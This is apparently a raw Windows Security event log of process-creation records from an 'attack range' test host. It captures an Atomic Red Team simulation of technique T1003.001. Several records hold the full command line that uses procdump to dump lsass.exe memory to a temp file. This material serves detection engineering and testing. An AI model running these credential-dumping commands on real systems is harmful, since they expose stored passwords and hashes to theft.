4688201331200x80200000000000002786614Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x13dcC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe%%19360x177cC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmpNULL SID--0x0C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002786610Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x177cC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe%%19360x694C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmpNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002786608Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x694C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp"NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002786592Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1fb0C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe%%19360x1818C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmpNULL SID--0x0C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002786588Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1818C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe%%19360x3e4C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmpNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002786586Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x3e4C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp"NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002779952Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x190cC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe%%19360x229cC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmpNULL SID--0x0C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002779946Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x229cC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe%%19360x1504C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmpNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002779944Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1504C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp"NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002773414Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x192cC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360x7c0"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}} NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level